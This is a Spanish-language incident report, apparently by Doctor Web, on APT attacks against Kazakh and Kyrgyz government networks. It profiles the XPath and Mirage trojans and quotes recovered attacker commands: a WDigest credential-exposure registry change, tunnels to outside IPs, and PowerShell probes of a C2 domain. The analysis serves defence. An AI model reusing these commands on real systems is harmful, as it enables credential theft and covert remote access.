20 de julio de 2020

Introducción

Como objeto de estudio los ataques objetivo a las grandes empresas e instituciones públicas son de mucho interés para los expertos en seguridad informática. La investigación de estos incidentes permite analizar la estrategia y las herramientas usadas por los malintencionados para hackear los sistemas informáticos y elaborar las medidas de contrataque correspondientes. El software usado en los ataque objetivo suele ser único porque se desarrolla según los objetivos y las tareas de los atacantes y no aparece la información pública. Comparado con amenazas masivas, las muestras de este software no se analizan frecuentemente por los investigadores. Además, al llevar a cabo los ataques objetivo se usan los mecanismos integrales para ocultar los rastros de la actividad maliciosa, lo cual dificulta la detección de la presencia ajena dentro de la infraestructura de una entidad atacada.

En marzo del año 2019 la empresa Doctor Web fue contactada por un cliente de una institución pública de la Republica de Kazajistán sobre la presencia del software malicioso en un equipo de la red corporativa. Esta solicitud provocó una investigación según los resultados de la cual los expertos de nuestra empresa detectaron y por primera vez describieron un grupo de programas troyanos usados para un ataque objetivo completo a la institución. Los materiales que tenemos nos permitieron enterarse de las herramientas y los objetivos de los malintencionados que penetraron en la red informática interna. Durante la investigación fue confirmado que la infraestructura de red de la institución fue comprometida como mínimo a partir del diciembre del año 2017.

Además, en febrero del año 2020 la empresa Doctor Web fue contactada por los representantes de una institución pública de la República de Kirguistán con características de infección de la red corporativa. Nuestro peritaje detectó la presencia de algún malware en la red, algunas modificaciones del cual también se habían usado para el ataque a la entidad en Kazajistán. El análisis demostró que, al igual que en el caso anterior, la infección empezó mucho antes de la solicitud, en marzo del año 2017.

Tomando en cuenta que la presencia no autorizada en ambas infraestructuras continuó por lo menos durante tres años, así como que al investigar los informes de servidores fueron detectados familias completamente distintas de programas troyanos, admitimos que hay varios grupos de hackers a la vez que tienen que ver con estos ataques. Así mismo, algunos de los troyanos usados son ampliamente conocidos: una parte de los mismos son herramientas exclusivas de los grupos APT conocidos, y la otra parte se usa por varios grupos APT de China.

Información general sobre el ataque y las herramientas usadas

Hemos podido investigar con detalle la información de varios servidores entre servidores pertenecientes a las instituciones víctimas de Kazajistán y Kirguistán. Todos los dispositivos analizados en la investigación funcionan con sistemas operativos Microsoft Windows.

El malware usado para el ataque objetivo puede ser dividido en dos categorías:

• masivo, instalado en la mayoría de los equipos de la red;
• especializado instalado en los servidores de interés para el atacante.

Las muestras analizadas del malware y las utilidades usadas por los malintencionados permiten suponer un escenario del ataque siguiente. Una vez explotadas correctamente las vulnerabilidades y obtenido el acceso al equipo de la red, los malintencionados cargaban al mismo una modificación del troyano de la familia BackDoor.PlugX. Los módulos de la carga útil del troyano permitían administrar el equipo infectado de forma remota y usarlo para la propagación posterior por la red. Otro troyano, supuestamente usado para la infección primaria fue BackDoor.Whitebird.1. El backdoor estaba destinado para los sistemas operativos de 64 bits y tenía funcionalidad bastante universal: el soporte de la conexión cifrada con el servidor de control, así como las funciones del manager de archivos, proxy y administración remota a través del shell de comandos.

Una vez establecida la presencia en la res, el grupo de hackers usado el software malicioso especial para resolver sus tareas. La distribución de los programas troyanos especiales por dispositivos infectados puede consultarse más abajo.

Controlador del dominio #1:

Trojan.Misics
Trojan.XPath

Controlador del dominio #2:

Trojan.Misics
Trojan.Mirage

Controlador del dominio #3:

BackDoor.Mikroceen
BackDoor.Logtu

Servidor #1:

BackDoor.Mikroceen

Servidor #2:

Trojan.Mirage
BackDoor.CmdUdp.1

De los troyanos mencionados cabe destacar la familia XPath cuyos representantes, según nuestra información, no habían sido descritas antes públicamente. La familia dispone de un rootkit para ocultar la actividad en la red y los rastros de presencia en el sistema comprometido que pudimos detectar con el antirootkit Dr.Web instalado en el servidor atacado. Las muestras investigadas fueron compiladas en los años 2017-2018. Así mismo, estos programas se basan en los proyectos del código fuente abierto lanzados unos años antes. Así, por ejemplo, en las muestras investigadas fueron usadas las versiones del paquete WinDivert de los años 2013-2015. Esto indica de forma indirecta que las primeras modificaciones de XPath también podían haber sido desarrolladas en aquel periodo.

XPath es un troyano modular cada componente del cual corresponde a la etapa determinada de funcionamiento del programa malicioso. El proceso de infección empieza por el funcionamiento del instalador de componentes detectado como Trojan.XPath.1. El instalador usa la configuración cifrada fijada en su cuerpo e inicia la cara útil al instalar un controlador o con el método COM Hijacking. El programa usa el registro del sistema para guardar sus módulos y así mismo se usa tanto el cifrado como la compresión de datos.

Trojan.XPath.2 es un controlador y sirve para ocultar la presencia de la actividad maliciosa en el sistema comprometido al iniciar otro módulo al mismo tiempo. El controlador tiene firmas digitales chinas, y su funcionamiento se basa en los proyectos del código fuente abierto. A diferencia de otros componentes guardados en el registro del sistema, los archivos del controlador están en el disco, así mismo, el programa funciona de forma oculta. Además de ocultar el archivo del controlador en el disco, las tareas del componente son: implementar el cargador de la carga útil en el proceso lsass.exe, así como camuflar la actividad de red del troyano. El escenario de funcionamiento cambia en función del sistema operativo.

El nombre original del tercer componente es PayloadDll.c. La biblioteca detectada como Trojan.XPath.3 es un módulo intermediario y sirve para implementar en el proceso svhost.exe la carga útil guardada en el registro usando el método COM Hijacking.

La funcionalidad básica está en el módulo de la carga útil detectado como Trojan.XPath.4. El componente ha sido creado en C++, y también se basa en los proyectos de código fuente abierto. Al igual que la mayoría del malware analizada en la investigación, este troyano sirve para obtener acceso no autorizado a los equipos infectados y robar los datos privados. Su peculiaridad es la posibilidad de funcionar en dos modos. El primero es el funcionamiento en modo cliente (Client Mode). En este modo el troyano se conecta al servidor de control y espera los comandos entrantes. El segundo es el funcionamiento en modo agente (Agent Mode). En este modo Trojan.XPath.4 realiza las funciones del servidor: escucha los puertos determinados al esperar la conexión de otros clientes a los mismos y al enviarles comandos. De esta forma, los desarrolladores han previsto un escenario de implementación del servidor de control local dentro de la red atacada para redirigir los comandos del servidor de control externo a los equipos infectados dentro de la red.

La descripción detallada del funcionamiento de los programas de la familia XPath está en la versión PDF de la investigación y también está disponible en la biblioteca de virus Dr.Web.

Entre otros hallazgos interesantes cabe destacar la peculiaridad de realizar el acceso al Shell de comandos del troyano Mirage. Para redirigir la entrada y salida del Shell de comandos el malware usaba los archivos que pudimos recibir desde el servidor infectado. De esta forma, pudimos ver los comandos ejecutados por los malintencionados con la función del troyano ofrecida, así como los datos recibidos en respuesta:

reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f
ipconfig /displaydns
c:\windows\debug\windbg.exe -n 202.74.232.2 -o 53,80,443
c:\windows\debug\windbg.exe -n 202.74.232.2 -o 143,110
reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Wdigest

El archive iniciado windbg.exe fue un escáner de puertos TCP/UPD, PortQry.

Durante la investigación recibimos las evidencias que de forma indirecta confirman la conexión de los ataques objetivo a las instituciones de Asia Central. Así, por ejemplo, una de las muestras localizadas de BackDoor.PlugX.38 usaba de servidor de control el dominio nicodonald[.]accesscam[.]org usado también como servidor de control para BackDoor.Apper.14, también conocido como ICEFOG NG. Hace varios años detectamos un backdoor de esta familia en un mensaje phishing enviado a una de las instituciones públicas de Kazajistán. Además, el documento RTF que instala esta muestra BackDoor.Apper.14, por primera vez fue cargado a VirusTotal de Kazajistán el 19 de marzo de 2019.

Un hallazgo interesante para el incidente en Kirguistán fue el backdoor Logtu detectado en el servidor infectado junto con Mikroceen. Además del conjunto similar de malware usado por los malintencionados, Mikroceen permite suponer la supuesta conexión de los dos ataques: la muestra de este backdoor bastante particular fue localizado en ambas redes y en ambos casos se instalaba en el Controlador del dominioа.

Al buscar las muestras que tienen que ver con estos ataques, fue localizado un backdoor preparado a propósito que realiza el acceso BIND Shell al shell de comandos. La ruta hasta los caracteres de depuración contiene el nombre del proyecto en chino — 正向马源码, lo cual puede indicar la procedencia correspondiente del troyano.

Además del malware, para la posterior propagación por la red los malintencionados usaban las siguientes utilidades disponibles públicamente:

• Mimikatz
• TCP Port Scanner V1.2 By WinEggDrop
• Nbtscan
• PsExec
• wmiexec.vbs
• goMS17-010
• ZXPortMap v1.0 By LZX
• Earthworm
• PortQry version 2.0 GOLD

Más abajo podemos consultar los ejemplos de inicio de algunas de las utilidades mencionadas.

• ZXPortMap: vmwared.exe 21 46.105.227.110 53
• Earthworm: cryptsocket.exe -s rssocks -d 137.175.79.212 -e 53

El grupo APT también usaba activamente sus propios scripts PowerShell para recopilar la información sobre el equipo infectado, otros dispositivos de la red, la comprobación de los servidores de control desde el equipo infectado y las tareas similares. Además, localizamos un script PowerShell destinado para descargar de Microsoft Exchange Server todo el contenido de buzones de correo de varios empleados de la entidad.

Ejemplos de algunos scripts PowerShell ejecutados en los servidores infectados:

%COMSPEC% /Q /c tasklist /v >>c:\programdata\2.txt
%COMSPEC% /Q /c systeminfo >>c:\programdata\2.txt
%COMSPEC% /Q /c netstat -nvb    >> c:\programdata\2.txt
powershell -exec bypass -command "& {  foreach($i in 53,80,443){ echo ((new-object Net.Sockets.TcpClient).Connect('v.nnncity.xyz',$i))  "port:"$i } 2 > $null  }" >>c:\programdata\2.txt

Resumen

Durante la investigación nuestros expertos han podido localizar varias familias a la vez de programas troyanos usados en estos ataques. El análisis de las muestras y actividad maliciosa demostró que el hacheo de la infraestructura de red se había producido mucho antes de detectar las primeras características de infección por el personal de la entidad. Lamentablemente este escenario es uno de los atributos de los ataques APT de éxito porque muchos recursos de los creadores de virus siempre están destinados para ocultar su propia presencia en el sistema.

La investigación no fue dedicada al vector primario de la infección, ni a la imagen común de la infección de toda la infraestructura. Estamos seguros de que los troyanos descritos en la investigación son solo una parte del malware usado en estos ataques. Los mecanismos usados por los hackers dificultan muchas veces no solo la detección de la intrusión no autorizada, sino también la posibilidad de volver a controlar los objetos de la red.

Para minimizar los riesgos, hace falta supervisar constantemente los recursos de red, sobre todo de los servidores que son de mayor interés para los malintencionados, — los controladores del dominio, los servidores de correo, las Gateways de Internet. En caso de compromiso del sistema es necesario analizar el caso de forma operativa y correcta para crear las medidas de respuesta adecuadas. Doctor Web no solamente crea los medios de protección antivirus, sino también presta servicios de investigación de los incidentes informáticos vinculados a virus, entre los cuales también cabe destacar los ataques objetivo. En caso de sospecha de actividad maliciosa en la red corporativa, recomendamos solicitar ayuda cualificada al laboratorio de virus de Doctor Web. La respuesta oportuna permitirá minimizar el daño y prevenir las peores consecuencias de los ataques informáticos objetivo.

Indicadores del compromiso.